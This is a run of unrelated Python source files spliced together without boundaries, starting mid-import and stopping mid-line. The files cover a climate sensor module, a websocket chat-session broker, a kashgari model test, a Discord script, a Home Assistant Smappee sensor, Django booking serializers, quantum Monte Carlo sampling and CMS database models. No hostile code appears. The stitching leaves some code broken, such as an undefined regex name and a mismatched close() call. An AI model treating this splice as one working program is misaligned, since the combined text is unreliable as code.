import TemperatureTag, TemperatureTagException from .tag.humidity import HumidityTag, HumidityTagException from .tag.barometer import BarometerTag, BarometerTagException from .tag.lux_meter import LuxMeterTag, LuxMeterTagException class ClimateModuleException(Exception): pass class ClimateModule: def __init__(self, bm): self._bm = bm self._temperature_tag = TemperatureTag(bm, bus=0, address=0x48) self._humidity_tag = HumidityTag(bm, bus=0, address=0x40) self._barometer_tag = BarometerTag(bm, bus=0, address=0x60) self._lux_meter_tag = LuxMeterTag(bm, bus=0, address=0x44) def measure(self): try: temperature = self._temperature_tag.measure() except TemperatureTagException:
raise ClimateModuleException try: humidity = self._humidity_tag.measure()[0] except HumidityTagException: raise ClimateModuleException try: pressure, altitude = self._barometer_tag.measure() except BarometerTagException: raise ClimateModuleException try: illuminance = self._lux_meter_tag.measure() except LuxMeterTagException: raise ClimateModuleException return { 'temperature': temperature, 'humidity': humidity, 'pressure': pressure, 'altitude': altitude, 'illuminance': illuminance } ratnania/mlhiphymlhiphy/__init__.py __version__ = "0.1" from mlhiphy import calculus from mlhiphy import kernels """ Contains the classes required to bind to client-server connection together to a client-server-server-client CCCSession. The CCC-Session allows for the clients to talk to each other in both directions """ from datetime import datetime from uuid import UUID from autobahn.asyncio.websocket import WebSocketServerProtocol import logutil import exception class SessionStore(object): """Singleton instance containing all sessions of the corresponding CCCServer""" __instance = None @staticmethod def instance(): """Creates the singleton instance if it does not yet exist and returns it""" if SessionStore.__instance is None: SessionStore.__instance = SessionStore() return SessionStore.__instance def __init__(self): self.session_dict = dict() self.log = logutil.get_logger(self) def add_connection(self, client_con, message): """ If no session for the given session id exits: Creates a new session and adds it to the dict. Calls the sessions addClientConnection() method to ask the session to add the connection """ parts = message.split(':') session_id = UUID(parts[0]) method = parts[1] self.log.info('Adding connection with method [{}] to session [{}]'.format(method, session_id)) session = self.session_dict.get(session_id) if session is None: session = CCCSession(session_id) self.session_dict[session_id] = session session.add_connection(client_con, method) return session def remove_session(self, session): """Removes this session from the running server""" if session.session_id in self.session_dict: del self.session_dict[session.session_id] self.log.info('Removed session [{}] from store'.format(session.session_id)) class SocketServerConnection(WebSocketServerProtocol): """Connection between the ccc_server and one chat client""" def __init__(self): super().__init__() self.enclosing_session = None self.client_adr = None self.log = logutil.get_logger(self) def onConnect(self, request): # pylint: disable=C0103 """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" self.client_adr = request.peer self.log.info("Client connecting: {0}".format(self.client_adr)) def onOpen(self): # pylint: disable=C0103 """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" pass def onMessage(self, payload, isBinary): # pylint: disable=C0103 """Callback. 
Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" try: if isBinary: raise exception.CCCException("Received binary data - should only be text") message = payload.decode('utf8').strip() self.log.info('message received: ' + message) if (self.enclosing_session is None or not self.enclosing_session.is_cc_connected()): self.enclosing_session = SessionStore.instance().add_connection(self, message) else: response = self.enclosing_session.forward_message(self, message) if response is not None: self.send_text(response) except exception.Error504 as ex: # This client tried to connect to session with already established connection self.log.exception(str(ex)) self.send_text(str(ex)) self.close(CCCSession.CR_APP_PROTOCOLEXCEPTION) except Exception as ex: # pylint: disable=W0703 self.log.exception(ex) close_reason = CCCSession.CR_APP_PROTOCOLEXCEPTION if not isinstance(ex, exception.CCCException): close_reason = CCCSession.CR_APP_EXCEPTION if self.enclosing_session is not None: self.enclosing_session.close(close_reason, channel=self) def send_text(self, text): """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" payload = text.encode('utf8') self.sendMessage(payload, isBinary=False) def close(self, reason_code): """Closes this websocket and sets references to the socket to None""" self.enclosing_session = None reason_text = CCCSession.close_reasons[reason_code] self.sendClose(code=reason_code, reason=reason_text) def onClose(self, wasClean, code, reason): # pylint: disable=W0613, C0103 """Callback. Signature ist specified in autobahn.websocket.interfaces.IWebSocketChannel""" if code is None or code < 3000: if reason is None: reason = CCCSession.close_reasons[CCCSession.CR_CHANNEL_CLOSE] if self.enclosing_session is not None: self.enclosing_session.channel_closed(self) else: reason = CCCSession.close_reasons[code] self.log.info("WebSocket connection to [{}] closed. Reason: {}".format(self.client_adr, reason)) class CCCSession(object): """ CCCSession represents a client client connection with brokering ccc_server in between. The session lives lives from the moment of the first connect of either app or gis to the moment of a connection close. Due to security considerations the session is only open a limited time to accept a handshaking connection of the later connecting client. 
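    Illustrative handshake (my summary of the methods below, not part of the original design notes):
        1. The first client connects and sends '<session_id>:appConnect' or '<session_id>:gisConnect'.
        2. The second client connects with the complementary method and the same session id.
        3. Once both channels are present the session emits 'ready' to both sides and then
           forwards every subsequent text message verbatim to the opposite channel.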
""" #Close reasons (CR) why the session closes CR_APP_EXCEPTION = 3000 #General exception causing the session to close CR_APP_PROTOCOLEXCEPTION = 3010 #Exception in the application server was raised due to client protocol violation CR_CHANNEL_CLOSE = 1000 #The channel to either gis or app client was closed (externally) close_reasons = { CR_APP_EXCEPTION: 'General unexpected ccc server exception', CR_APP_PROTOCOLEXCEPTION: 'Severe violation of the protocoll through calling client', CR_CHANNEL_CLOSE: 'Channel to app or gis client was closed externally' } def __init__(self, session_id): self.session_id = session_id self.first_connect = None self.giscon = None self.appcon = None self.log = logutil.get_logger(self) def add_connection(self, client_con, method): """ Adds either a connection originating from the application or the gis client Aspekte: app oder gis schon verbunden oder nicht 'fehlerhandling' """ add_ok = False self.log.info('Adding connection to existing session [{}] by method [{}]'.format(self.session_id, method)) if method == 'appConnect': if self.appcon is None: self.appcon = client_con else: raise exception.Error504(self.session_id, 'app') elif method == 'gisConnect': if self.giscon is None: self.giscon = client_con add_ok = True else: raise exception.Error504(self.session_id, 'gis') else: raise exception.Error503() if self.is_cc_connected(): self._emit_ready() else: self.first_connect = datetime.now() def _emit_ready(self): """Sends the ready message to both clients""" msg = 'ready' self.appcon.send_text(msg) self.giscon.send_text(msg) def forward_message(self, source_con, message): """Forwards the message from ist source connection to the destination connection""" destination_con = self._other_channel(source_con) destination_con.send_text(message) return None def is_cc_connected(self): """ Returns true if the handshake between the connections is done, allowing the session to forward messages from one connection to the other """ gis_connected = self.giscon is not None app_connected = self.appcon is not None return gis_connected and app_connected def channel_closed(self, source_channel): """ Called from a channel's onClose method if the channel is the source of the close. After notifying the other channel, removes the channels from the session and the session from the session store. """ other = self._other_channel(source_channel) if other is not None: self._close_channel(other, CCCSession.CR_CHANNEL_CLOSE) self._destruct() def _destruct(self): """Removes the session from the store, removes the channels from the session""" SessionStore.instance().remove_session(self) self.giscon = None self.appcon = None def close(self, reason_code): """ Closes the connections of this session and removes the session from the session store """ reason = CCCSession.close_reasons[reason_code] self.log.info('Closing session due to reason: {}'.format(reason)) channels = [self.giscon, self.appcon] for channel in channels: if channel is not None: self._close_channel(channel, reason_code) self._destruct() def _other_channel(self, channel): """Returns the other channel. 
Example: If the gis channel is given as argument, the app channel is returned""" other_channel = None if channel is self.giscon: other_channel = self.appcon elif channel is self.appcon: other_channel = self.giscon else: raise exception.CCCException('Could not identify given channel') return other_channel def _channel_clienttype(self, channel): """Returns the name of the client type of the channel: gisclient or appclient""" channel_name = None if channel is self.giscon: channel_name = 'gisclient' elif channel is self.appcon: channel_name = 'appclient' else: raise exception.CCCException('Could not identify given channel') return channel_name def _close_channel(self, channel, reason_code): """Tries to close the given channel. Logs an exception if closing was not possible""" try: channel.close(reason_code) except Exception: # pylint: disable=W0703 reason_txt = CCCSession.close_reasons[reason_code] channel_name = self._channel_clienttype(channel) self.log.exception('Error sending close to {}. Close reason: {}'.format(channel_name, reason_txt)) # encoding: utf-8 # author: BrikerMan # contact: # blog: https://eliyar.biz # file: test_cnn_lstm_model.py # time: 2019-05-31 19:05 import os import tempfile import time import unittest import numpy as np from tensorflow.python.keras.utils import get_file import kashgari from kashgari.corpus import ChineseDailyNerCorpus from kashgari.embeddings import WordEmbedding from kashgari.macros import DATA_PATH from kashgari.tasks.labeling import CNN_LSTM_Model from tests.corpus import NERCorpus valid_x, valid_y = ChineseDailyNerCorpus.load_data('valid') sample_w2v_path = get_file('sample_w2v.txt', "http://s3.bmio.net/kashgari/sample_w2v.txt", cache_dir=DATA_PATH) class TestCNN_LSTM_Model(unittest.TestCase): @classmethod def setUpClass(cls): cls.model_class = CNN_LSTM_Model def test_basic_use_build(self): x, y = NERCorpus.load_corpus() model = self.model_class() model.fit(x, y, x, y, epochs=1) model.predict_entities(x[:5]) model.evaluate(x, y) res = model.predict(x[:20]) assert len(res) == min(len(x), 20) for i in range(5): assert len(res[i]) == min(model.embedding.sequence_length, len(x[i])) model_path = os.path.join(tempfile.gettempdir(), str(time.time())) model.save(model_path) pd_model_path = os.path.join(tempfile.gettempdir(), str(time.time())) kashgari.utils.convert_to_saved_model(model, pd_model_path) new_model = kashgari.utils.load_model(model_path) new_res = new_model.predict(x[:20]) assert np.array_equal(new_res, res) new_model.compile_model() model.fit(x, y, x, y, epochs=1) def test_fit_without_generator(self): x, y = NERCorpus.load_corpus('custom_2') model = self.model_class() model.fit_without_generator(x, y, x, y, epochs=2) def test_w2v_model(self): x, y = NERCorpus.load_corpus() w2v_embedding = WordEmbedding(sample_w2v_path, task=kashgari.LABELING) model = self.model_class(embedding=w2v_embedding) try: model.fit(x, y, x, y, epochs=1) model.evaluate(x, y) assert True except Exception as e: print(model.label2idx) raise e def test_variable_length_model(self): x, y = NERCorpus.load_corpus('custom_2') hyper_params = self.model_class.get_default_hyper_parameters() for layer, config in hyper_params.items(): for key, value in config.items(): if isinstance(value, int): hyper_params[layer][key] = value + 15 w2v_embedding_variable_len = WordEmbedding(sample_w2v_path, task=kashgari.LABELING, sequence_length='variable') model = self.model_class(embedding=w2v_embedding_variable_len, hyper_parameters=hyper_params) try: model.fit(x, y, epochs=1) model.evaluate(x, 
y) assert True except Exception as e: print(model.label2idx) raise e old_code/LGPSI_check.py #!/usr/bin/env python3 import codecs import collections import glob import re import unicodedata from normalise import convert c = collections.Counter() for FILENAME in glob.glob("src/*.md"): with codecs.open(FILENAME, "r", encoding="utf-8-sig") as f: for LINE_NUM, line in enumerate(f, 1): for TOKEN_NUM, token in enumerate(line.split(), 1): token = unicodedata.normalize("NFD", token) if token in ["#", "##"]: pass elif token == "...": pass elif re.match("[CDI]+", token): pass else: m = re.match(TOKEN_REGEX, token, re.VERBOSE) if m: word = unicodedata.normalize("NFC", m.groupdict()["word"]) if word == "ἀλλα": print(FILENAME, LINE_NUM, TOKEN_NUM, token, [hex(ord(ch)) for ch in token]) quit() c[word] += 1 else: print("INVALID TOKEN:") print(FILENAME, LINE_NUM, TOKEN_NUM, token, [hex(ord(ch)) for ch in token]) quit() for word, count in c.most_common(): norm, reasons = convert(word) # print(norm, word, reasons) if "ERROR" in reasons: print(' "' + word + '",') bin/get_server_channels.py import discord import json import sys client = discord.Client() @client.event async def on_ready(): server = client.get_server(sys.argv[1]) for channel in server.channels: print("%s: %s" % (channel.name, channel.id)) await client.logout() with open('keys/bot_token.json') as f: token = json.load(f)['token'] client.run(token) TakutoYoshikai/weasley-zoom from setuptools import setup, find_packages setup( name = 'weasley-zoom', version = '1.0.0', url = 'https://github.com/TakutoYoshikai/weasley-zoom.git', license = 'MIT LICENSE', author = '', author_email = '', description = 'This is a tool to close ZOOM window automatically at given time.', install_requires = ['setuptools', "pyautogui"], packages = find_packages(), entry_points={ "console_scripts": [ "weasley-zoom = weasley.weasley:main", ] } ) """Support for monitoring a Smappee energy sensor.""" from homeassistant.components.sensor import SensorEntity from homeassistant.const import DEVICE_CLASS_POWER, ENERGY_WATT_HOUR, POWER_WATT, VOLT from .const import DOMAIN TREND_SENSORS = { "total_power": [ "Total consumption - Active power", None, POWER_WATT, "total_power", DEVICE_CLASS_POWER, True, # both cloud and local ], "alwayson": [ "Always on - Active power", None, POWER_WATT, "alwayson", DEVICE_CLASS_POWER, False, # cloud only ], "power_today": [ "Total consumption - Today", "mdi:power-plug", ENERGY_WATT_HOUR, "power_today", None, False, # cloud only ], "power_current_hour": [ "Total consumption - Current hour", "mdi:power-plug", ENERGY_WATT_HOUR, "power_current_hour", None, False, # cloud only ], "power_last_5_minutes": [ "Total consumption - Last 5 minutes", "mdi:power-plug", ENERGY_WATT_HOUR, "power_last_5_minutes", None, False, # cloud only ], "alwayson_today": [ "Always on - Today", "mdi:sleep", ENERGY_WATT_HOUR, "alwayson_today", None, False, # cloud only ], } REACTIVE_SENSORS = { "total_reactive_power": [ "Total consumption - Reactive power", None, POWER_WATT, "total_reactive_power", DEVICE_CLASS_POWER, ] } SOLAR_SENSORS = { "solar_power": [ "Total production - Active power", None, POWER_WATT, "solar_power", DEVICE_CLASS_POWER, True, # both cloud and local ], "solar_today": [ "Total production - Today", "mdi:white-balance-sunny", ENERGY_WATT_HOUR, "solar_today", None, False, # cloud only ], "solar_current_hour": [ "Total production - Current hour", "mdi:white-balance-sunny", ENERGY_WATT_HOUR, "solar_current_hour", None, False, # cloud only ], } VOLTAGE_SENSORS = { 
"phase_voltages_a": [ "Phase voltages - A", "mdi:flash", VOLT, "phase_voltage_a", None, ["ONE", "TWO", "THREE_STAR", "THREE_DELTA"], ], "phase_voltages_b": [ "Phase voltages - B", "mdi:flash", VOLT, "phase_voltage_b", None, ["TWO", "THREE_STAR", "THREE_DELTA"], ], "phase_voltages_c": [ "Phase voltages - C", "mdi:flash", VOLT, "phase_voltage_c", None, ["THREE_STAR"], ], "line_voltages_a": [ "Line voltages - A", "mdi:flash", VOLT, "line_voltage_a", None, ["ONE", "TWO", "THREE_STAR", "THREE_DELTA"], ], "line_voltages_b": [ "Line voltages - B", "mdi:flash", VOLT, "line_voltage_b", None, ["TWO", "THREE_STAR", "THREE_DELTA"], ], "line_voltages_c": [ "Line voltages - C", "mdi:flash", VOLT, "line_voltage_c", None, ["THREE_STAR", "THREE_DELTA"], ], } async def async_setup_entry(hass, config_entry, async_add_entities): """Set up the Smappee sensor.""" smappee_base = hass.data[DOMAIN][config_entry.entry_id] entities = [] for service_location in smappee_base.smappee.service_locations.values(): # Add all basic sensors (realtime values and aggregators) # Some are available in local only env for sensor in TREND_SENSORS: if not service_location.local_polling or TREND_SENSORS[sensor][5]: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=sensor, attributes=TREND_SENSORS[sensor], ) ) if service_location.has_reactive_value: for reactive_sensor in REACTIVE_SENSORS: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=reactive_sensor, attributes=REACTIVE_SENSORS[reactive_sensor], ) ) # Add solar sensors (some are available in local only env) if service_location.has_solar_production: for sensor in SOLAR_SENSORS: if not service_location.local_polling or SOLAR_SENSORS[sensor][5]: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=sensor, attributes=SOLAR_SENSORS[sensor], ) ) # Add all CT measurements for measurement_id, measurement in service_location.measurements.items(): entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor="load", attributes=[ measurement.name, None, POWER_WATT, measurement_id, DEVICE_CLASS_POWER, ], ) ) # Add phase- and line voltages if available if service_location.has_voltage_values: for sensor_name, sensor in VOLTAGE_SENSORS.items(): if service_location.phase_type in sensor[5]: entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor=sensor_name, attributes=sensor, ) ) # Add Gas and Water sensors for sensor_id, sensor in service_location.sensors.items(): for channel in sensor.channels: gw_icon = "mdi:gas-cylinder" if channel.get("type") == "water": gw_icon = "mdi:water" entities.append( SmappeeSensor( smappee_base=smappee_base, service_location=service_location, sensor="sensor", attributes=[ channel.get("name"), gw_icon, channel.get("uom"), f"{sensor_id}-{channel.get('channel')}", None, ], ) ) async_add_entities(entities, True) class SmappeeSensor(SensorEntity): """Implementation of a Smappee sensor.""" def __init__(self, smappee_base, service_location, sensor, attributes): """Initialize the Smappee sensor.""" self._smappee_base = smappee_base self._service_location = service_location self._sensor = sensor self.data = None self._state = None self._name = attributes[0] self._icon = attributes[1] self._unit_of_measurement = attributes[2] self._sensor_id = attributes[3] self._device_class = attributes[4] @property def name(self): """Return the name for this 
sensor.""" if self._sensor in ["sensor", "load"]: return ( f"{self._service_location.service_location_name} - " f"{self._sensor.title()} - {self._name}" ) return f"{self._service_location.service_location_name} - {self._name}" @property def icon(self): """Icon to use in the frontend.""" return self._icon @property def state(self): """Return the state of the sensor.""" return self._state @property def device_class(self): """Return the class of this device, from component DEVICE_CLASSES.""" return self._device_class @property def unit_of_measurement(self): """Return the unit of measurement of this entity, if any.""" return self._unit_of_measurement @property def unique_id( self, ): """Return the unique ID for this sensor.""" if self._sensor in ["load", "sensor"]: return ( f"{self._service_location.device_serial_number}-" f"{self._service_location.service_location_id}-" f"{self._sensor}-{self._sensor_id}" ) return ( f"{self._service_location.device_serial_number}-" f"{self._service_location.service_location_id}-" f"{self._sensor}" ) @property def device_info(self): """Return the device info for this sensor.""" return { "identifiers": {(DOMAIN, self._service_location.device_serial_number)}, "name": self._service_location.service_location_name, "manufacturer": "Smappee", "model": self._service_location.device_model, "sw_version": self._service_location.firmware_version, } async def async_update(self): """Get the latest data from Smappee and update the state.""" await self._smappee_base.async_update() if self._sensor == "total_power": self._state = self._service_location.total_power elif self._sensor == "total_reactive_power": self._state = self._service_location.total_reactive_power elif self._sensor == "solar_power": self._state = self._service_location.solar_power elif self._sensor == "alwayson": self._state = self._service_location.alwayson elif self._sensor in [ "phase_voltages_a", "phase_voltages_b", "phase_voltages_c", ]: phase_voltages = self._service_location.phase_voltages if phase_voltages is not None: if self._sensor == "phase_voltages_a": self._state = phase_voltages[0] elif self._sensor == "phase_voltages_b": self._state = phase_voltages[1] elif self._sensor == "phase_voltages_c": self._state = phase_voltages[2] elif self._sensor in ["line_voltages_a", "line_voltages_b", "line_voltages_c"]: line_voltages = self._service_location.line_voltages if line_voltages is not None: if self._sensor == "line_voltages_a": self._state = line_voltages[0] elif self._sensor == "line_voltages_b": self._state = line_voltages[1] elif self._sensor == "line_voltages_c": self._state = line_voltages[2] elif self._sensor in [ "power_today", "power_current_hour", "power_last_5_minutes", "solar_today", "solar_current_hour", "alwayson_today", ]: trend_value = self._service_location.aggregated_values.get(self._sensor) self._state = round(trend_value) if trend_value is not None else None elif self._sensor == "load": self._state = self._service_location.measurements.get( self._sensor_id ).active_total elif self._sensor == "sensor": sensor_id, channel_id = self._sensor_id.split("-") sensor = self._service_location.sensors.get(int(sensor_id)) for channel in sensor.channels: if channel.get("channel") == int(channel_id): self._state = channel.get("value_today") from django.conf import settings from django.core.exceptions import ObjectDoesNotExist from rest_framework import serializers from rest_framework.exceptions import ValidationError from bookings.models import Booking from gtfs.models import Departure, 
RiderCategory, Route def get_object_by_api_id(qs, api_id): try: return qs.get(api_id=api_id) except ObjectDoesNotExist: raise ValidationError( f'Invalid ID "{api_id}" - object does not exist.', code="does_not_exist" ) class TicketSerializer(serializers.Serializer): ticket_type_id = serializers.UUIDField() customer_type_id = serializers.UUIDField() def validate_ticket_type_id(self, value): if "route" not in self.parent.parent.context: return None self.context["fare"] = get_object_by_api_id( self.parent.parent.context["route"].fares.all(), value ) return self.context["fare"] def validate_customer_type_id(self, value): if "fare" not in self.context: return return get_object_by_api_id( RiderCategory.objects.filter(fares=self.context["fare"]), value, ) def validate(self, data): data["fare"] = data.pop("ticket_type_id", None) data["fare_rider_category"] = data.pop("customer_type_id", None) return data class PassthroughParametersSerializer(serializers.Serializer): request_id = serializers.CharField(required=False, allow_blank=True) transaction_id = serializers.CharField( required=False, max_length=255, write_only=True, allow_blank=True ) locale = serializers.ChoiceField(choices=settings.TICKET_LANGUAGES, required=False) class BookingSerializer(PassthroughParametersSerializer, serializers.ModelSerializer): route_id = serializers.UUIDField(required=False, write_only=True) departure_ids = serializers.ListField( child=serializers.UUIDField(), required=False, allow_empty=False, write_only=True, ) tickets = TicketSerializer(many=True, write_only=True) locale = serializers.ChoiceField( choices=settings.TICKET_LANGUAGES, required=False, write_only=True ) id = serializers.UUIDField(source="api_id", read_only=True) class Meta: model = Booking fields = ( "route_id", "departure_ids", "tickets", "locale", "id", "status", "request_id", "transaction_id", ) read_only_fields = ("id", "status") def validate_route_id(self, value): self.context["route"] = get_object_by_api_id( Route.objects.for_maas_operator(self.context["request"].user.maas_operator), value, ) return self.context["route"] def validate_departure_ids(self, values): departures = [ get_object_by_api_id( Departure.objects.for_maas_operator( self.context["request"].user.maas_operator ), departure_id, ) for departure_id in values ] if "route" not in self.context: self.context["route"] = departures[0].trip.route if not all(d.trip.route == self.context["route"] for d in departures): raise ValidationError( "All departures must belong to the same route.", code="invalid_departures", ) if self.context["route"].capacity_sales in ( Route.CapacitySales.REQUIRED_FOR_OUTBOUND, Route.CapacitySales.REQUIRED_FOR_INBOUND, ): required_direction_id = ( 0 if self.context["route"].capacity_sales == Route.CapacitySales.REQUIRED_FOR_OUTBOUND else 1 ) if ( len(departures) != 1 or departures[0].trip.direction_id != required_direction_id ): raise ValidationError( f"Exactly one {'inbound' if required_direction_id else 'outbound'} " f"departure must be selected for this route.", code="invalid_departures", ) return departures def validate(self, data): """Format the validated data keys to indicate they contain objects not ids. 
Final output structure: { "route": Route, "departures": [Departure...], "tickets": [{"fare": Fare, "fare_rider_category": FareRiderCategory}...], "locale": str } """ data["route"] = data.pop("route_id", self.context.get("route")) data["departures"] = data.pop("departure_ids", []) if not (data["route"] or data["departures"]): raise ValidationError( "Either a route or a departure is required.", code="missing_route_and_departure", ) return data def create(self, validated_data): return Booking.objects.create_reservation( self.context["request"].user.maas_operator, self.validated_data["route"].feed.ticketing_system, ticket_data=validated_data, ) class ApiTicketSerializer(serializers.Serializer): ticket_type_id = serializers.CharField(source="fare.source_id") customer_type_id = serializers.CharField(source="fare_rider_category.source_id") class ApiDepartureSerializer(serializers.Serializer): trip_id = serializers.CharField(source="trip.source_id") date = serializers.DateField() class ApiBookingSerializer(PassthroughParametersSerializer): """Serializes BookingSerializer data to ticketing system API format.""" transaction_id = serializers.CharField(required=False, allow_blank=True) maas_operator_id = serializers.CharField(source="maas_operator.identifier") route_id = serializers.CharField(required=False, source="route.source_id") departures = ApiDepartureSerializer(required=False, many=True) tickets = ApiTicketSerializer(required=False, many=True) class ApiAvailabilitySerializer(serializers.Serializer): """Serializes Departures to Trips and dates for ticketing system API.""" trip_id = serializers.CharField(source="trip.source_id") date = serializers.DateField() YiqingZhouKelly/pyqmc0 # This must be done BEFORE importing numpy or anything else. # Therefore it must be in your main script. import os os.environ["MKL_NUM_THREADS"] = "1" os.environ["NUMEXPR_NUM_THREADS"] = "1" os.environ["OMP_NUM_THREADS"] = "1" import numpy as np import h5py def initial_guess(mol, nconfig, r=1.0): """ Generate an initial guess by distributing electrons near atoms proportional to their charge. Args: mol: A PySCF-like molecule object. Should have atom_charges(), atom_coords(), and nelec nconfig: How many configurations to generate. r: How far from the atoms to distribute the electrons Returns: A numpy array with shape (nconfig,nelectrons,3) with the electrons randomly distributed near the atoms. 
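    Example (illustrative sketch only; assumes a PySCF-style molecule object named mol, as described above):
        configs = initial_guess(mol, nconfig=500, r=1.0)
        # configs.configs.shape == (500, sum(mol.nelec), 3)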
""" from pyqmc.coord import OpenConfigs, PeriodicConfigs epos = np.zeros((nconfig, np.sum(mol.nelec), 3)) wts = mol.atom_charges() wts = wts / np.sum(wts) # assign electrons to atoms based on atom charges # assign the minimum number first, and assign the leftover ones randomly # this algorithm chooses atoms *with replacement* to assign leftover electrons for s in [0, 1]: neach = np.array( np.floor(mol.nelec[s] * wts), dtype=int ) # integer number of elec on each atom nleft = ( mol.nelec[s] * wts - neach ) # fraction of electron unassigned on each atom nassigned = np.sum(neach) # number of electrons assigned totleft = int(mol.nelec[s] - nassigned) # number of electrons not yet assigned if totleft > 0: bins = np.cumsum(nleft) / totleft inds = np.argpartition( np.random.random((nconfig, len(wts))), totleft, axis=1 )[:, :totleft] ind0 = s * mol.nelec[0] epos[:, ind0 : ind0 + nassigned, :] = np.repeat( mol.atom_coords(), neach, axis=0 )[ np.newaxis ] # assign core electrons epos[:, ind0 + nassigned : ind0 + mol.nelec[s], :] = mol.atom_coords()[ inds ] # assign remaining electrons epos += r * np.random.randn(*epos.shape) # random shifts from atom positions if hasattr(mol, "a"): epos = PeriodicConfigs(epos, mol.lattice_vectors()) else: epos = OpenConfigs(epos) return epos def limdrift(g, cutoff=1): """ Limit a vector to have a maximum magnitude of cutoff while maintaining direction Args: g: a [nconf,ndim] vector cutoff: the maximum magnitude Returns: The vector with the cut off applied. """ tot = np.linalg.norm(g, axis=1) mask = tot > cutoff g[mask, :] = cutoff * g[mask, :] / tot[mask, np.newaxis] return g def vmc_file(hdf_file, data, attr, configs): import pyqmc.hdftools as hdftools if hdf_file is not None: with h5py.File(hdf_file, "a") as hdf: if "configs" not in hdf.keys(): hdftools.setup_hdf(hdf, data, attr) hdf.create_dataset("configs", configs.configs.shape) hdftools.append_hdf(hdf, data) hdf["configs"][:, :, :] = configs.configs def vmc( wf, configs, nsteps=100, tstep=0.5, accumulators=None, verbose=False, stepoffset=0, hdf_file=None, ): """Run a Monte Carlo sample of a given wave function. Args: wf: A Wave function-like class. recompute(), gradient(), and updateinternals() are used, as well as anything (such as laplacian() ) used by accumulators configs: Initial electron coordinates nsteps: Number of VMC steps to propagate tstep: Time step for move proposals. Only affects efficiency. accumulators: A dictionary of functor objects that take in (configs,wf) and return a dictionary of quantities to be averaged. np.mean(quantity,axis=0) should give the average over configurations. If None, then the coordinates will only be propagated with acceptance information. verbose: Print out step information stepoffset: If continuing a run, what to start the step numbering at. Returns: (df,configs) df: A list of dictionaries nstep long that contains all results from the accumulators. These are averaged across all walkers. configs: The final coordinates from this calculation. 
""" if accumulators is None: accumulators = {} if verbose: print("WARNING: running VMC with no accumulators") # Restart if hdf_file is not None: with h5py.File(hdf_file, "a") as hdf: if "configs" in hdf.keys(): configs.configs = np.array(hdf["configs"]) if verbose: print("Restarted calculation") nconf, nelec, ndim = configs.configs.shape df = [] wf.recompute(configs) for step in range(nsteps): if verbose: print("step", step) acc = [] for e in range(nelec): # Propose move grad = limdrift(np.real(wf.gradient(e, configs.electron(e)).T)) gauss = np.random.normal(scale=np.sqrt(tstep), size=(nconf, 3)) newcoorde = configs.configs[:, e, :] + gauss + grad * tstep newcoorde = configs.make_irreducible(e, newcoorde) # Compute reverse move new_grad = limdrift(np.real(wf.gradient(e, newcoorde).T)) forward = np.sum(gauss ** 2, axis=1) backward = np.sum((gauss + tstep * (grad + new_grad)) ** 2, axis=1) # Acceptance t_prob = np.exp(1 / (2 * tstep) * (forward - backward)) ratio = np.multiply(wf.testvalue(e, newcoorde) ** 2, t_prob) accept = ratio > np.random.rand(nconf) # Update wave function configs.move(e, newcoorde, accept) wf.updateinternals(e, newcoorde, mask=accept) acc.append(np.mean(accept)) avg = {} for k, accumulator in accumulators.items(): dat = accumulator.avg(configs, wf) for m, res in dat.items(): # print(m,res.nbytes/1024/1024) avg[k + m] = res # np.mean(res,axis=0) avg["acceptance"] = np.mean(acc) avg["step"] = stepoffset + step avg["nconfig"] = nconf vmc_file(hdf_file, avg, dict(tstep=tstep), configs) df.append(avg) return df, configs from __future__ import print_function __author__ = '' import sqlalchemy import sqlalchemy.ext.declarative import subprocess from datetime import datetime import os import sys import logging import string import json import CondCore.Utilities.credentials as auth prod_db_service = 'cms_orcon_prod' dev_db_service = 'cms_orcoff_prep' schema_name = 'CMS_CONDITIONS' sqlalchemy_tpl = 'oracle://%s:%s@%s' coral_tpl = 'oracle://%s/%s' private_db = 'sqlite:///o2o_jobs.db' startStatus = -1 messageLevelEnvVar = 'O2O_LOG_LEVEL' logFolderEnvVar = 'O2O_LOG_FOLDER' logger = logging.getLogger(__name__) _Base = sqlalchemy.ext.declarative.declarative_base() class O2OJob(_Base): __tablename__ = 'O2O_JOB' __table_args__ = {'schema' : schema_name} name = sqlalchemy.Column(sqlalchemy.String(100), primary_key=True) enabled = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) frequent = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) tag_name = sqlalchemy.Column(sqlalchemy.String(100), nullable=False) interval = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) class O2OJobConf(_Base): __tablename__ = 'O2O_JOB_CONF' __table_args__ = {'schema' : schema_name} job_name = sqlalchemy.Column(sqlalchemy.ForeignKey(O2OJob.name), primary_key=True) insertion_time = sqlalchemy.Column(sqlalchemy.TIMESTAMP, primary_key=True) configuration = sqlalchemy.Column(sqlalchemy.String(4000), nullable=False) job = sqlalchemy.orm.relationship('O2OJob', primaryjoin="O2OJob.name==O2OJobConf.job_name") class O2ORun(_Base): __tablename__ = 'O2O_RUN' __table_args__ = {'schema' : schema_name} job_name = sqlalchemy.Column(sqlalchemy.ForeignKey(O2OJob.name), primary_key=True) start_time = sqlalchemy.Column(sqlalchemy.TIMESTAMP, primary_key=True) end_time = sqlalchemy.Column(sqlalchemy.TIMESTAMP, nullable=True) status_code = sqlalchemy.Column(sqlalchemy.Integer, nullable=False) log = sqlalchemy.Column(sqlalchemy.CLOB, nullable=True) job = sqlalchemy.orm.relationship('O2OJob', 
